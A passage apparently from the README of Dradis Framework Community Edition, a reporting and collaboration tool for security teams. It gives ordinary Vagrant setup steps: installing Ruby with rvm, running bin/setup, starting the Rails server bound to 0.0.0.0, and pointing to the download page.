# install ruby in the vagrant box
cd /dradis/dradis-ce
rvm install "$(cat .ruby-version)"


# Then you can proceed with standard setup from within Vagrant
ruby bin/setup
# You'll need to tell the server to bind to 0.0.0.0 for port forwarding:
bundle exec rails server -b 0.0.0.0

Stable release
In https://dradisframework.com/ce/download.html you will find the latest packages.

Getting help

Dradis Framework - Collaboration and reporting for IT Security teams